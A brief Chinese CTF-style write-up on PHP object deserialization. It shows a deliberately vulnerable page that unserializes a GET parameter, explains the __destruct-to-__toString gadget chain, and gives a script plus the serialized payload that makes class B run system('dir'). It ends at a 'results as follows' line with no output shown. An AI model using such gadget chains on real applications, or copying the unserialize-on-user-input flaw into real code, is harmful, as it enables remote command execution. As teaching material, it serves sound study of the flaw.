【web】-反序列化-to_string

<?php highlight_file(__FILE__); class A{     public $s;     public function __destruct()     {         echo "hello".$this->s;     }      } class B{     public $cmd;     public function __toString()     {         system($this->cmd);         return 1;     } } unserialize($_GET['code']);

__toString()当对象被当着字符串执行的时候，自动执行

起点："hello".$this->s;

终点：system($this->cmd);

跳板："hello".$this->s;

<?php highlight_file(__FILE__); class A{     public $s;     public function __destruct()     {         echo "hello".$this->s;     }      } class B{     public $cmd;     public function __toString()     {         system($this->cmd);         return "1";     } }   $a = new A(); $b = new B(); $b->cmd='dir'; $a->s=$b;  echo serialize($a); ?>   O:1:"A":1:{s:1:"s";O:1:"B":1:{s:3:"cmd";s:3:"dir";}}

执行结果如下：